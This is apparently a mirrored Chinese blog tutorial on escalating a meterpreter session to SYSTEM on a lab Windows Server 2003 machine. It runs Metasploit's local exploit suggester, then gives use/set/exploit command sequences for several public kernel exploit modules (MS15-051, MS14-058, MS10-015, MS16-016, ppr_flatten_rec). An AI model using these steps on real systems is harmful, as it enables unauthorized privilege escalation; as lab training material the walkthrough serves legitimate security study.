zoukankan      html  css  js  c++  java
  • msf利用- windows内核提权漏洞

     windows内核提权漏洞

     

    环境:

    Kali Linux(攻击机) 192.168.190.141

    Windows2003SP2(靶机) 192.168.190.147

     

     

     

    0x01寻找可利用的exp

    实战中我们在拿到一个反弹shell(meterpreter)下一步会进行提权操作,而metaspolit的内置模块Local Exploit Suggester。这个模块可以帮助我们识别系统存在哪些漏洞可以被利用,并且为我们提供最合适的exp,通过这个exp我们可以进一步提权。

    如下图,有一个普通用户权限的会话

     

     

     

     

    在拿到meterpreter会话的前提下,我们可以利用这个模块进行收集

     

     

     

     

     

     

    可以看到我这里有和目标机的一个session会话,id4,我们使用local_exploit_suggester模块

     

    
    
    use post/multi/recon/local_exploit_suggester
    
     
    
    set LHOST 192.168.190.141
    
     
    
    set SESSION 1
    
     
    
    Exploit
    
    
    
    
    

     

     

     

    如下图所示,它自动的为我们匹配出了一些可能的用于易受攻击目标提权的漏洞利用的exp模块。

     

    0x02 利用exp提权

    根据metaspolit的内置模块Local Exploit Suggester模块列出的可利用模块,我们来进行提权,提权成功后会返回新的、提升权限成功后的session会话。

    选取了几个常见的可利用的模块来进行提权演示。

     

    Windows ClientCopyImage Win32k Exploit(ms15_051)
    Windows内核模式驱动程序中的漏洞让攻击者可以进行提权。
    这个模块利用了win32k.sys内核模式驱动程序中不正确的对象处理。

     

     

    使用模块 查看设置的参数

    设置参数 提权

    use exploit/windows/local/ms15_051_client_copy_image
    
    set lhost 192.168.190.141
    
    set session 4
    
    exploit

     

     

    Windows TrackPopupMenu Win32k NULL Pointer Dereference(ms14_058)
    该模块利用了win32k.sys中的NULL Pointer Dereference,这个漏洞可以通过使用TrackPopupMenu来触发。在特定情况下,可以在xxxSendMessage Timeout上滥用NULL Pointer Dereference来获取任意代码执行。
    这个模块已经在Windows XP SP3,Windows Server 2003 SP2,Windows7 SP1,Windows Server2008 32位和Windows Server2008R2 SP164位上测试过。

    use exploit/windows/local/ms14_058_track_popup_menu
    
    set lhost 192.168.190.141
    
    set session 4
    
    exploit
     

     

     

    通过KiTrap0D进行Windows系统提权(ms10_015)
    这个模块会通过Kitrap0D这个exp来生成一个SYSTEM权限的新会话,如果当前会话已经是SYSTEM权限,那么这个脚本将不起作用。这个脚本依赖于kitrap0d.x86.dll这个文件,而且不支持64位的Windows操作系统。
    该模块已经在存在漏洞的Windows Server 2003,Windows Server 2008,Windows7和XP上测试过,只限32位操作系统。

     

    use exploit/windows/local/ms10_015_kitrap0d
    
    set lhost 192.168.190.141
    
    set session 4
    
    exploit

     

     

    mrxdav.sys WebDav本地提权MS16-016
    这个exp利用的是mrxdav.sys中的漏洞,漏洞编号是MS16-016。该模块会在目标主机上生成一个进程,并通过在特权进程的环境下执行指定的payload来提权。
    该模块在存在漏洞的Windows7 SP1 x86架构上测试过可行。

    use exploit/windows/local/ms16_016_webdav
    
    set lhost 192.168.190.141
    
    set session 4
    
    exploit

     

     

     

     

    EPATHOBJ::pprFlattenRec本地提权
    这个漏洞是由于EPATHOBJ::pprFlattenRec使用了未初始化的数据而产生的,该漏洞可以对内存产生破坏。
    而我们的这个脚本就是利用这个漏洞来提权的。

    这个模块已经在Windows XP SP3,Windows2003SP1和Windows7SP1上成功执行。

    use exploit/windows/local/ppr_flatten_rec
    
    set lhost 192.168.190.141
    
    set session 4
    
    exploit
     

    因为实验是sp2就没有成功

     

     

  • 相关阅读:
    功能测试--评论测试点
    airtest自动化测试工具使用
    jmeter录制脚本失败原因(windows为例)
    测试APP电量、内存、网络流量工具----GT
    Java--使用反编译工具,打开jar包,查看源码
    jmeter(图片进行base64加密发送)
    jmeter之永久性修改为中文显示界面方法
    jmeter之发送请求失败,乌龙---千万不要在请求体的写注释
    jmeter使用BeanShell进行简单的base64加密
    使用JS报错 xx is not defined at HTMLAnchorElement.onclick
  • 原文地址:https://www.cnblogs.com/-qing-/p/10609714.html
Copyright © 2011-2022 走看看